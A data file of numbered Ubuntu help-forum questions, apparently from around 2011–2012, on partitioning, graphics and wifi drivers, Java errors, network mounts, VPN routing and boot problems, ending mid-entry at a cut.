84355	not enough primary partitions available	i own an msi laptop . there are 4 partitions : 2 recovery ( hidden ) and 2 dynamic . win7 is on a dynamic disk . i want to install ubuntu 11 on my laptop as well . i ca n't make another primary partition . when i would be able to make another primary partition ( ie the 3rd ) im still stuck with the recovery disks . this means there is only 1 primary partition available for the os . how to get the 2 dynamic disk into a primary one . how to release 1 of the 2 hidden partitions without losing the recover data ?
84356	ubuntu automatically logs in to netbook version , have no options on desktop	i am running ubuntu 10.4 and tried to install unity , the website i found advised me to install netbook-remix . every time i boot it automatically logs into the netbook version without asking for a password and them i am stuck with no menu , icons etc.. all i 'm able to do is access the terminal through keyboard shortcut but i have no idea how to set ubuntu to log in to gnome from the terminal . thanks for any help .
84357	my lenovo s12 laptop ( intel atom ) is taking a very , very long time to boot . can i fix this ?	basically it will not boot without holding down the power key . it has taken as long as 10 minutes .
84358	i 'm having trouble connecting to a wireless network , and the hardware switch is on,	so , just recently my computer has not been connecting to the internet . it had been working before but it just went off one day in the middle of use . i 've gone into the network setting and made sure everything is in the correct place , with airplane mode off and wireless ticked on , but wireless ticks back off immediately . i 've tried the lshw -c network command and see that the *-network disabled is the wireless network , but when i use sudo ifconfig wlan1 ( the logical name under said entry ) up , i get the error wlan0 : error while getting interface flags : no such device . i have not removed anything nor only been connected to an ethernet connection . does anyone have a next step ?
84360	ubuntu 11.10 does n't recognise second graphics card	i have two graphics cards installed , both nvidia . a geforce 9600 and a geforce 6200 turbocache . i 'd like to run my two monitors from the dvi port on each card . the 9600 is working fine , the 6200 is not . running lspci shows the both cards in place . 01:00.0 vga compatible controller : nvidia corporation g94 [ geforce 9600 gt ] ( rev a1 ) 06:00.0 vga compatible controller : nvidia corporation nv44 [ geforce 6200 turbocache ( tm ) ] ( rev a1 ) running xrandr shows the following : screen 0 : minimum 320 x 200 , current 1920 x 1200 , maximum 8192 x 8192 dvi-i-1 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 519mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 1680x1050 60.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 vga-1 disconnected ( normal left inverted right x axis y axis ) hdmi-1 disconnected ( normal left inverted right x axis y axis ) these are the ports that relate to the 9600 card . can anyone help me with getting the 6200 card recognised ? i currently do not have additional nvidia drivers installed . i tried running with `` nvidia accelerated graphics driver ( version current ) [ recommended ] '' installed , but things got worse . my monitor changed from dell 24 '' to 'unknown ' in display settings and the list of ports disappeared from xrandr . finally , this pc is on a dual boot with win7 under which both cards and monitors work fine , so i know the hardware is good .
84366	rm -i alias not working with sudo as root	i have noticed in all my ubuntu servers the alias rm -i is ignored when you run sudo rm * as root . is there something in sudo that is causing this behavior ? i know you do n't need to use sudo when you are root however in the event that a jr sa were to do so it would remove the contents of the directory . also knowing that rm in ubuntu does not preserve / it could mean a total system meltdown . example as root : johndoe @ hostname : /tmp/foobar $ sudo su - root @ www3d : ~ # cd /tmp/foobar root @ hostname : /tmp/foobar # for i in 'a b c d e f g ' ; do touch $ i ; done root @ hostname : /tmp/foobar # sudo rm * root @ hostname : /tmp/foobar # for i in 'a b c d e f g ' ; do touch $ i ; done root @ hostname : /tmp/foobar # rm * rm : remove regular empty file `a ' ? y rm : remove regular empty file `b ' ? y rm : remove regular empty file `c ' ? y rm : remove regular empty file `d ' ? y rm : remove regular empty file `e ' ? y rm : remove regular empty file `f ' ? y rm : remove regular empty file `g ' ? y root @ hostname : /tmp/foobar # for i in 'a b c ' ; do touch $ i ; done root @ hostname : /tmp/foobar # rm * rm : remove regular empty file `a ' ? y rm : remove regular empty file `b ' ? y rm : remove regular empty file `c ' ? y root @ hostname : /tmp/foobar # for i in 'a b c ' ; do touch $ i ; done root @ hostname : /tmp/foobar # sudo rm * root @ hostname : /tmp/foobar # ls root @ hostname : /tmp/foobar # exit logout example as user : johndoe @ hostname : /tmp/foobar $ for i in 'a b c ' ; do touch $ i ; done johndoe @ hostname : /tmp/foobar $ rm * rm : remove regular empty file `a ' ? y rm : remove regular empty file `b ' ? y rm : remove regular empty file `c ' ? y johndoe @ hostname : /tmp/foobar $ for i in 'a b c ' ; do touch $ i ; done johndoe @ hostname : /tmp/foobar $ sudo rm * rm : remove regular empty file `a ' ? y rm : remove regular empty file `b ' ? y rm : remove regular empty file `c ' ? y
84369	running compiz using optirun ?	i have an optimus laptop . i have ironhide installed , and can use optirun to run programs using the discrete gpu from the command line . however , is there any way to run compiz itself on the discrete gpu ?
84370	play videos with libwebkit in ubuntu 11.10 server	i 'm using libwebkit ( with python-webkit ) to render a page that plays a video . this application works fine in a ubuntu 11.04 desktop , nvidia card and lots of libraries and software installed , but in a fresh ubuntu 11.10 server with intel 82945g/gz card the video does not play . i guess either some codec package is missing or it 's a driver problem . what could be missing for this to play ? i 'm trying with this video : http : //video.eustasy.co.uk/480/ edit : does n't look like a driver problem . with chromium i can play the video , but with libwebkit + python-webkit the video just shows the first frame and does n't play . any hints on what package could be missing ? solved : apparently it had to do with lack of audio . while chrome would play the video with no sound , libwebkit would n't start video . adding user to audio and video groups solved the problem .
84380	paper documents ( archive ) manager for ubuntu	i 'm looking for an archive manager for ubuntu . by 'archive ' i mean a real archive , the one with paper documents inside . i tried tellico , but it 's really intended for books , not documents . any suggestions ? p.s . : i 'm sorry if the title is n't clear enough .
84383	computer froze when installing ubuntu	i was installing ubuntu on my windows 7 laptop ( creating a dual boot ) and the wifi does n't work on the laptop so i had to plug it in on the slower connection , and when it was trying to download the language packs it froze and has now been frozen for almost half an hour ! what should i do ? any help appreciated thanks .
84385	getting drivers to work for intel gma 950	i recently switched over my netbook to ubuntu 11.10 and i 'm having issues with detecting the graphics chipset . the closest i 've come to finding a solution that does not require messing with git ( something i 'm not ready to do ) is this . however this seems to be for the 915 ( m ? ) chipset and i have n't been able to figure out the grub line-change ( i.e . `` i915.modeset=1 '' ) that works for my chipset . does anyone know which line i should use/or another way to get ubuntu to recognize my chipset ?
84389	are there plans for a web interface for ubuntu software centre	most operating systems that have a `` app store '' native application also have a web version of their app store where applications can be added to a wish list , purchased and/or downloaded . i think it would be a good idea for ubuntu software centre to also have a web version . since its not a good idea to download .debs , it could be done in such a way that downloads can not be done if you are not running ubuntu . this should not be too difficult to implement using the `` apt : '' link parameter . sites such as http : //getdeb.net already utilize the apt : link in a web store like service . is this already in the works or are there plans to do it in the future ? if no , why not ?
84404	what is the risk in adding unknown ppas ?	whenever i add a new repository ppa , i get a warning asking me if i trust it . ubuntu does n't catch any virus or malware since it asks password for each and everything . so , the question is : what is the risk in adding unknown ppas ?
84409	converting images to ppm p3 ( using convert command )	i was wondering if there is a quick way to convert a given image to a ppm image that is in version p3 . the convert command returns it in p6 by default . thanks !
84417	ubuntu stalls during installation on acer powerseries	during completeerase and install of boot drive , the process seems to be hanging endlessly . the progress bar has notmoved for awhile , and it has been stuck on `` retrieving file 53 of 85 '' for some time . the hardrive light is off , but it has n't flickered at all . not even when it was progressing through files . is any of this normal ? edit : retried . must have been a network issue .
84419	disable updating of ethernet driver	i discovered that the latest driver for my computers ethernet-adapter did not work . i fixed this by downloading an earlier driver , which worked perfectly . however every time i run `` apt-get upgrade '' , the driver i have downgraded gets updated . while simply reinstalling the old driver fixes the issue , it 's quite annoying . i 'm running ubuntu 11.10 64-bit . the driver that works is `` r8168 '' and the newer driver that does n't work is `` r8169 '' . is there a way to tell apt not to install the newer , not working , driver ?
84421	`` ca n't open display '' weirdness over ssh	some time back , ( maybe a year ? ) , my environment was working correctly . but some time in the last year or so i started getting `` ca n't open display '' errors . it 's weird because i can ssh into the ubuntu box , ( from a mac , over cisco ipsec ) , and start several new x11 clients . but at some point , ( 1 - 20 minutes later ) , new attempts to start x11 clients result in `` ca n't open display '' errors . if there 's any other antecedent event that leads to the `` ca n't open display '' problem , i havent ' figured it out . my display has n't changed in this time . preexisting windows continue to exist and function so i believe my local x11 server is good , running , and that the previously existing x11 forwarding tunnels are still functioning . it appears to be a problem with the initial rendezvous to the display . does this sound familiar to anyone ?
84425	after uninstalling edubuntu , my dash icon has been replaced by a question mark	i 'm new to linux . i had no idea that edubuntu would change as much as it did . i thought it was just a folder with a bunch of apps . anyway i uninstalled it , but the following command i used ( from http : //www.psychocats.net/ubuntu/puregnome ) took the dash icon away with it . so can anyone tell me how i could just simply reset the dash icon , that would be great . sudo apt-get remove akonadi-backend-mysql akonadi-server alacarte arkose arkose-gui arkose-nautilus atomix atomix-data avogadro-data blinken blt breathe-icon-theme ca-certificates-java calibre calibre-bin celestia-common celestia-gnome cgroup-lite debootstrap default-jdk default-jre default-jre-headless desktop-profiles dia-common dia-gnome dia-libs docbook-xsl edubuntu-artwork edubuntu-desktop edubuntu-docs edubuntu-fonts edubuntu-menueditor edubuntu-wallpapers freemind freemind-doc gamine gamine-data gcompris gcompris-data gcompris-sound-en geogebra gimp gimp-data gir1.2-nautilus-3.0 gir1.2-panelapplet-4.0 gnome-applets gnome-applets-data gnome-icon-theme-gartoon-redux gnome-panel gnome-panel-data gnome-session-fallback gobby-0.5 gobby-infinote gsfonts-x11 human-icon-theme human-theme icc-profiles icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx icedtea-plugin icoutils imagemagick inkscape italc-client italc-master java-common java-wrappers javahelp2 junit kalzium kalzium-data kanagram kate-data katepart kbruch kde-runtime kde-runtime-data kdebase-runtime kdeedu-kvtml-data kdelibs-bin kdelibs5-data kdelibs5-plugins kdepim-runtime kdepimlibs-kio-plugins kdoctools khangman kig kmplot kolourpaint4 krosspython ktouch ktuberling kturtle kubuntu-debug-installer kwordquiz laby libaccess-bridge-java libaccess-bridge-java-jni libakonadi-contact4 libakonadi-kabc4 libakonadi-kcal4 libakonadi-kde4 libakonadi-kmime4 libakonadiprotocolinternals1 libart-2.0-2 libattica0 libavogadro1 libbabl-0.0-0 libbackport-util-concurrent-java libbcel-java libblas3gf libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libboost-program-options1.46.1 libboost-python1.46.1 libcdt4 libchm1 libcln6 libclucene0ldbl libcommons-codec-java libcommons-math-java libcompoundviewer4 libdlrestrictions1 libdmtx0a libdom4j-java libdxflib-2.2.0.0 libencode-locale-perl libfile-listing-perl libfont-afm-perl libfparser-4.3 libfreehep-export-java libfreehep-graphics2d-java libfreehep-graphicsio-emf-java libfreehep-graphicsio-java libfreehep-graphicsio-pdf-java libfreehep-graphicsio-svg-java libfreehep-graphicsio-tests-java libfreehep-io-java libfreehep-swing-java libfreehep-util-java libfreehep-xml-java libgc1c2 libgegl-0.0-0 libgetopt-java libgfortran3 libgimp2.0 libglade2-0 libgnome2-0 libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnu-regexp-java libgps19 libgraph4 libgsasl7 libgsl0ldbl libgtkglext1 libgtksourceview2.0-0 libgtksourceview2.0-common libgvc5 libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libice-dev libilmbase6 libinfgtk-0.5-0 libinfinity-0.5-0 libio-socket-ssl-perl libiodbc2 libitalc libjama-java libjas-plotter-java libjaxen-java libjaxme-java libjaxp1.3-java libjcommon-java libjdom1-java libjfreechart-java libjgoodies-forms-java libjibx1.1-java libkabc4 libkatepartinterfaces4 libkcal4 libkcalcore4 libkcalutils4 libkcmutils4 libkde3support4 libkdecore5 libkdeedu-data libkdegames5a libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkeduvocdocument4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkimap4 libkio5 libkjsapi4 libkjsembed4 libkldap4 libkmbox4 libkmediaplayer4 libkmime4 libknewstuff2-4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpimidentities4 libkpimtextedit4 libkpimutils4 libkprintutils4 libkpty4 libkresources4 libkrosscore4 libktexteditor4 libkunitconversion4 liblapack3gf liblog4j1.2-java liblqr-1-0 liblwp-mediatypes-perl liblwp-protocol-https-perl libmagick++3 libmagickcore3 libmagickcore3-extra libmagickwand3 libmailtools-perl libmailtransport4 libmarblewidget12 libmicroblog4 libmikmod2 libming1 libmono-corlib2.0-cil libmono-i18n-west2.0-cil libnepomuk4 libnepomukquery4a libnepomukutils4 libnet-http-perl libnet-ssleay-perl libnetpbm10 libntlm0 libntrack-qt4-1 libntrack0 libopenbabel4 libopenexr6 libopenide-util-java libpanel-applet-4-0 libpathplan4 libphonon4 libplasma3 libpodofo0.9.0 libpolkit-qt-1-1 libprison0 libpthread-stubs0 libpthread-stubs0-dev libqalculate5 libqapt-runtime libqapt1 libqca2 libqdox-java libqimageblitz4 libqrencode3 libqt4-designer libqt4-help libqt4-qt3support libqt4-scripttools libqt4-sql-sqlite libqt4-test libqtassistantclient4 libqtwebkit4 librecad librecad-data librecad-doc libregexp-java libscience4 libsdl-image1.2 libsdl-mixer1.2 libsdl-net1.2 libsdl-pango1 libsdl-ttf2.0-0 libsm-dev libsmpeg0 libsolid4 libsoprano4 libssh-4 libstreamanalyzer0 libstreams0 libtablelayout-java libthreadweaver4 libtimedate-perl liburi-perl libvirtodbc0 libwmf-bin libwww-perl libwww-robotrules-perl libwxbase2.6-0 libwxgtk2.6-0 libx11-dev libxau-dev libxcb1-dev libxcomp3 libxdmcp-dev libxerces2-java libxml++2.6-2 libxml2-utils libxom-java libxpp2-java libxpp3-java libxss1 libxt-dev liferea liferea-data lightspeed lmodern luatex lxc lybniz marble marble-data marble-plugins mathpiper melting mysql-client-core-5.1 mysql-server-core-5.1 netpbm ntrack-module-libnl-0 nxproxy odbcinst odbcinst1debian2 opendict openjdk-6-jdk openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib otf-freefont oxygen-icon-theme parley parley-data pdfmod pencil perlmagick phonon phonon-backend-gstreamer plasma-scriptengine-javascript plymouth-theme-edubuntu python-avogadro python-beautifulsoup python-central python-cherrypy3 python-clientform python-configobj python-cssutils python-cssutils-doc python-django python-django-tagging python-dnspython python-encutils python-gevent python-gmenu python-gnome2 python-greenlet python-kde4 python-lxml python-mechanize python-nautilus python-netaddr python-numpy python-paramiko python-pyorbit python-pyparsing python-pysqlite2 python-qt4 python-renderpm python-reportlab python-reportlab-accel python-routes python-sip python-tk python-uniconvertor python-webob python-wimpiggy python-wxgtk2.6 python-wxversion python-x2go qapt-batch ri-li ri-li-data rlwrap scribus-ng shared-desktop-ontologies simplyhtml soprano-daemon stellarium stellarium-data step tcl8.5 tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-latex-base texlive-latex-base-doc texlive-luatex texlive-xetex tk8.5 ttf-adf-accanthis ttf-adf-baskervald ttf-adf-berenis ttf-adf-gillius ttf-adf-ikarius ttf-adf-irianis ttf-adf-libris ttf-adf-mekanus ttf-adf-oldania ttf-adf-romande ttf-adf-switzera ttf-adf-tribun ttf-adf-universalis ttf-adf-verana ttf-aenigma ttf-ancient-fonts ttf-atarismall ttf-bengali-fonts ttf-beteckna ttf-bpg-georgian-fonts ttf-breip ttf-century-catalogue ttf-dejavu-extra ttf-devanagari-fonts ttf-droid ttf-dustin ttf-ecolier-court ttf-ecolier-lignes-court ttf-engadget ttf-essays1743 ttf-femkeklaver ttf-fifthhorseman-dkg-handwriting ttf-georgewilliams ttf-goudybookletter ttf-gujarati-fonts ttf-inconsolata ttf-isabella ttf-junicode ttf-kannada-fonts ttf-levien-museum ttf-levien-typoscript ttf-linex ttf-linux-libertine ttf-marvosym ttf-mgopen ttf-oflb-asana-math ttf-oflb-euterpe ttf-okolaks ttf-opendin ttf-oriya-fonts ttf-radisnoir ttf-rufscript ttf-sil-andika ttf-sil-doulos ttf-sil-gentium ttf-sjfonts ttf-staypuft ttf-tamil-fonts ttf-telugu-fonts tuxmath tuxpaint tuxpaint-data tuxpaint-plugins-default tuxpaint-stamps-default tuxtype tuxtype-data tzdata-java ubuntu-edu-preschool ubuntu-edu-primary ubuntu-edu-secondary ubuntu-edu-tertiary virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common x11proto-core-dev x11proto-input-dev x11proto-kb-dev xaos xorg-sgml-doctools xpra xtrans-dev xvfb yorick yorick-data yorick-z & & sudo apt-get install ubuntu-desktop
84431	launcher sometimes does n't show with the mouse	i am using ubuntu 11.10 unity and i am getting more and more convinced by the concept of unity . my launcher is set to hide when covered by a window and to show up when the mouse pointer hid the left . however , once in a while when my mouse pointer hits the left nothing happens . tipping two times the super button ( unfortunately ) displaying a windows logo the launcher is back to work . any way to solve the problem or to hunt down the issue ? i tried all possible settings in dconf editor , compiz config manager and whatsoever .
84436	long shutdown time with 11.10	i 'm not sure if i 'm the only one experiencing this , but i have n't been able to google anything . no matter what hardware i 'm installing oneiric on , right from pentium to core2duo but mostly laptops , the time it takes to shutdown has raised remarkable ( maybe from 10 sec to 60 sec ) from natty to oneiric ( including precise alpha1 ) . i 'm taking about new clean installations from cd iso 's , an installation which has n't been fiddled with at all . hitting `` esc '' on it way down to get rid of the splash , i 'm noticing that it hangs for a long time before writing something about `` starting modem-manager [ ok ] '' but then after a couple of secs more power off fine ( and yes it says starting ) . i have tried to `` purge '' the modem-manager , but that does n't change much , so i 'm afraid this is n't the guilty bugger then . anyone having same experience , or know what is causing this great change ? why does shutdown time matter then ? - because i not interested in destroying any harddisks by moving a box that is still reading/writing it . `` pisu '' mentions bug # 875959 in another `` shutdown '' thread , maybe this could be the source - just remember in my case we 're talking a virgin install of ku or u-bunt here ... studying the above bug ( and it duplicate ) , i 've managed to cut 5-10 secs of by stopping network-manager before shutdown from gui , so this at least could be part of the problem .
84439	how do i make my pc boot in to lubuntu as default instead of unity	i 've installed the lubuntu desktop on my ubuntu 11.10 pc . my pc logs straight in to ubuntu unity without asking for a password . how do i make my pc boot in to lubuntu as default instead of unity .
84443	ubuntu wo n't boot after plugging in wireless network card	i plugged a skyr @ cer pro pci 154 into a ubuntu server 10.04 lts and tried to boot . it wo n't get further that launching apparmor , sometimes even not that far . without the network card , everything works just fine . is there anything i need to do prior to installing new hardware ? please note that i have no access to the graphical interface .
84451	screenshot captures no windows	i attempted to take a screenshot by hitting print screen . unfortunately , this was the result : did n't show the open firefox , chrome or terminal windows . it also did n't show the top bar or any desktop icons . just the desktop background . i tried running the screenshot app directly and obtained the same result . shutter worked though . i am using 11.10 with the gnome 3.2.1 shell . does anyone know what the issue is ? my system settings are : driver : vesa : rv710 experience : standard
84453	prevent nautilus from displaying thumbnails on a specific mount	i have written a filesystem over fuse to access a remote pseudo-nas ( the french `` freebox v6 '' , i 'll soon publish it as gpl3 ... when it 's a little bit more polished ! ) . the nas is connected to a home adsl , thus data comes down at the upload speed of adsl , which is at best 1mbps . my mount works fine ( read-only at the moment ) , but nautilus sees the mountpoint ( and all sub-directories ) as a `` local '' filesystem and tries to make thumbnails . as i have a directory full of images , this is quite horrible , because nautilus then opens all the images to try to display the thumbnail . i could switch the nautilus preferences to `` never '' for thumbnails , but then i 'll loose thumbnails on my `` real '' local filesystem . so the question is : with the preference `` only for local filesystem '' , how can i instruct nautilus that my mountpoint is in fact not a local mount so that it will stop trying to draw thumbnails on that specific mount , but continue `` thumbnailing '' on mounts that are really local ? edit note : the same things happens if you use `` standard worldwide '' mounts such as sshfs , davfs , ... as long as you mount over a relatively slow network ( adsl ) and have images/movies on your mounted tree .
84457	nvidia optimus , unity 3d and dual monitors	i have an nvidia quadro 2000m with nvidia optimus . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf106 [ quadro 2000m ] ( rev a1 ) i know that i will not be able to find drivers for the nvidia card , and i wo n't be able to use the nvidia card but my question is , using the intel card could i run unity 3d ? and if not , can i somehow use dual monitors without running unity 3d ? /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : unable to create the opengl context i know i 'm 'humped ' in terms of getting my nvidia card to do any work for me , but i just want to know if my intel card can do the work i want done .
84462	dell dimension 3000 goes into sleep and wo n't wake up	i installed ubuntu 11.10 on my old desktop dell dimension 3000 . the installation went well except that i noticed that it installed the os on the 1t external usb disk . the problem i am seeing is that after some no-activity time , it goes into the sleep mode and any key or the power button can wake it up . this does not happen every time . other times , it will show the lockout menu and request the password . does anyone have had similar problem and solved it ? any help will be greatly appreciated . i followed some similar posts and disabled my `` hibernate '' and `` suspend '' option on the menu . the only way i can come out of it is to power cycle the computer .
84474	how can i give admin permissions to my account ?	11.10 has allowed me to ( stupidly ) remove my admin level login leaving me with only my standard log in . i am no longer able to modify any software , update etc . how can i 'uprate ' my user login back up to admin level ?
84483	how to completely uninstall java ?	how can i completely remove all traces of java on my system ? i already know how to install it in case i need it again .
84486	end_request : i/o error on external drive	i 've been seeing occasional errors like this : kernel : [ 786407.826017 ] end_request : i/o error , dev sdd , sector 1424776960 sdd is a 1gb external seagate drive , split into a 600 mb ext2 ( sdd2 ) and a 400 mb ntfs ( sdd1 ) . is this error due to the fact that the drive auto-powers off , or is it time to budget for a replacement ? i did not see any errors like this prior to upgrading from 10.04 to 11.10 .
84487	errors using wubi on windows 7 home premium 64 bit	i tried to install ubuntu on my windows 7 64-bit pc and encountered multiple error screens . it finally showed an error with users\appdata\local\temp\wubi-11.10-rev245.log .
84491	can not execute java program : unsupportedclassversionerror	i have installed jdk 6 , but i ca n't execute a java program . for example , i have made test.java . i compile it with javac tes.java and there 's no error when i compile it , but when i want to execute that program it always displays an error . i execute the java program with java tes . exception in thread `` main '' java.lang.unsupportedclassversionerror : tes : unsupported major.minor version 51.0 at java.lang.classloader.defineclass1 ( native method ) at java.lang.classloader.defineclass ( classloader.java:634 ) at java.security.secureclassloader.defineclass ( secureclassloader.java:142 ) at java.net.urlclassloader.defineclass ( urlclassloader.java:277 ) at java.net.urlclassloader.access $ 000 ( urlclassloader.java:73 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:212 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : tes . program will exit . my javac version is 1.7.0 , my java version is 1.6.0 . here is my tes.java code : class tes { public static void main ( string [ ] args ) { system.out.println ( `` hello '' ) ; } }
84493	ca n't use symlinks in local /var/www directory	i 'm setting up my local lamp server , and when i go to it , i ca n't follow symlinks with the apache user ( www-data ) . at this point , i 've tried chowning and chmoding and i 've added options followsymlinks to my httpd.conf file for my documentroot . i 'm at a loss . so here 's what i 'm going to ask : if you were setting up your apache with a standard 11.10 lamp install , what would be the steps you would take to get symlinks to work correctly for the apache user ?
84494	what 's the easiest way to mount windows share as a local folder in home directory ?	via gnome nautilus i can easily mount samba shares from my ubuntu server . however , these `` mounts '' are kinda of fake . many applications i run do not recognize that gnome has mounted these server folders and therefore can not open files off my server . in the past i created an /etc/fstab entry and mounted them globally , the /mnt folder , but this is n't going to work as other people share my ubuntu laptop . what 's the easiest way to create a `` real '' samba mount in my ( and other people 's ) home directory ? it 's fine if its a command or a gui application that can run when i log in . these server folders do n't have to be mounted all the time .
84498	italics display issue	my italics are displaying weirdly in a number of programs , including firefox , chrome and kdiff3 . i have also been having another graphical issue . i am using 11.10 with the gnome 3.2.1 shell and ttf-mscore-fonts 3.3ubuntu4 . does anyone know what the issue is ? my system settings are : driver : vesa : rv710 experience : standard video card : ati technologies inc rv710 [ radeon hd 430 ]
84501	how can i change/convert a ubuntu mbr drive to a gpt , and make ubuntu boot from efi ?	i recently have upgraded my pc , my new motherboard ( asus m5a99x evo ) uses uefi instead of the regular mbr option . i have a ubuntu 11.10 installation that i did when i had my previous hardware ( msi ms 7267 ) , ubuntu alone boots fine , and so does windows 7 , however windows 7 is using uefi ( gpt ) boot whereas ubuntu is using mbr . i have my oss in separate drives , so that grub2 wont ' get replaced by the windows bootloader and viceversa , as i said both oss boot fine on their own , but to do that i have to disconnect one drive in this case the ubuntu drive as it prevents windows from loading . now my question is , how can i change/convert ubuntu 's drive so that instead of using mbr it uses gpt and allow windows to boot ? . preferably without reinstalling the whole system or lose any data . and if i were to wipe the drive , how can i install ubuntu in gpt , uefi , whatever it is mode ? . edit : i have used gdisk to convert from mbr to gpt , but now ubuntu ca n't boot seems like grub just does n't start . i have re installed the os , and the drive is gpt now by default however grup-pc is still being used instead of grub-efi . how can i make ubuntu boot from efi ? .
84502	why do i get a `` restart to complete updates `` warning ?	i updated my packages ubuntu 11.10 with update manager , and got : '' the package information was just updated '' and `` there are no updates to install '' . but i still have the warning from the restart icon , which is highlighted red . within it '' restart to complete the updates '' is also highlighted in red . i tried sudo apt-get upgrade and got message as : fetched 9,465 b in 3s ( 2,870 b/s ) reading package lists ... done yifang @ tan02 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . is this a bug for that warning ?
84509	downgrade from 11.10 to 10.04 lts	i installed ubuntu 11.04 ( natty ) version in my lenovo g-570 laptop but the wireless and bluetooth were showing as disabled ; after that i upgraded it to ubuntu 11.10 ( oneiric ) but it also was showing the wireless and bluetooth disabled . i googled for it and installed sta drivers , but the problem was still alive . now i want to downgrade ubuntu 11.10 ( oneiric ) to 10.04 . help me with how to downgrade it .
84514	no mouse in the session when running in virtual pc	after installing 11.10 desktop to virtual pc 7 i have no mouse in the session , and can not use the keyboard beyond logging in .
84516	how to set routes for my vpn connection	in my previous question i was asking about setting up vpnc connection . i 've installed network-manager-vpnc so now i can configure all this stuff right from network manager gui . i have got this pretty picture from related topic : so the question is how to figure out what address , netmask and gateway should i use to pass only this trafic through vpn . as a basis i have got an ip and a port of the external service which i want to use through vpnc . so inernet and other traffic should go as always through ethernet or wifi . external ip : 10.20.30.40 port : 1433 ( this is sql server actually )
84517	how can i keep my custom entry in /etc/hosts ?	since i upgraded my laptop to ubuntu 11.10 32-bit , the entry i add to /etc/hosts for my home server keeps disappearing on boot . i have to edit the hosts file every time i start up and want to access my server ( which is most times ) and i’d really rather not . any idea what’s causing this ? here’s my edited /etc/hosts : 127.0.0.1 localhost 127.0.1.1 galileo 192.168.3.10 myserver # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
84518	monitor does not turn on automatically dvi	i 'm running a presentation at the entrance of our company . before i did that using a hdmi connection without problems , but i had to replace the device and the new one has a dvi connection . the screen i 'm using has both . after several ours the screen is blank , even though when i open a serial terminal i find the machine is running the presentation . i did setterm -powersave off -blank 0 , so that should n't be it . the real problem is that the screen will not turn on even if i restart the machine . the screen comes back when i disconnect the screens power and connect again . is there a command i can use to wake up the dvi connection ? perhaps something that should be automatic , but for some reason might be missing/impaired ?
84519	getting error 5 while installing via usb	i 'm trying to install ubuntu 11.10 on my laptop with ubuntu 11.10 , 64-bit version through a usb drive i get the following error : this particular error is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . my hard disk is brand new and i also ran tests which showed that it was fine . also , the usb works fine on other machines . should i run 32 bit version ? i was using windows 7 64 bit version earlier on the same machine , but its hard disk got corrupted and i do n't have a bootable windows cd/dvd to reinstall . i read in a couple of forums that replacing/removing ram does the work . i have one stick of 2gb which is 2 years old and ran fine on windows , so that 's not an option for me . please advise .
84522	msi x350 wifi stopped working	i have a dual-boot of windows 7 and ubuntu 11.10 on my msi x350 . during the installation process and some time after the wireless worked just fine and i used the internet connection to install updates and everything . ( i think ) because of the distance to the router i sometimes had to reconnect manually ( click on the wireless button in the syslink and then click on my wifi network ) , but that was ok . the problem is that one time i could not reconnect so i shut the wifi off and on again to try another reconnect , but since then i was n't able to reconnect to the wifi and now i can not even switch on the wifi anymore ( it seems permanently disabled or something ) . under win7 however , everything works fine ( wifi connection and internet , as before ) . tl ; dr : my wifi used to work under win7 and ub11.10 and then stopped working under ub11.10 . info/hardware ( hopefully it 's readable , because i had to save the logs and open them again under win7 and the formation was lost ) : iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : off sudo lshw -c network *-network - description : ethernet interface - product : rtl8111/8168b pci express gigabit ethernet controller - vendor : realtek semiconductor co. , ltd. - physical id : 0 - bus info : pci @ 0000:02:00.0 - logical name : eth0 - version : 02 - serial : 40:61:86 : bc:1e : f6 - size : 10mbit/s - capacity : 1gbit/s - width : 64 bits - clock : 33mhz - capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation - configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s - resources : irq:42 ioport : e800 ( size=256 ) memory : feaff000-feafffff memory : fdff0000-fdffffff memory : feac0000-feadffff *-network disabled - description : wireless interface - product : rt3090 wireless 802.11n 1t/1r pcie - vendor : ralink corp. - physical id : 0 - bus info : pci @ 0000:03:00.0 - logical name : wlan0 - version : 00 - serial : 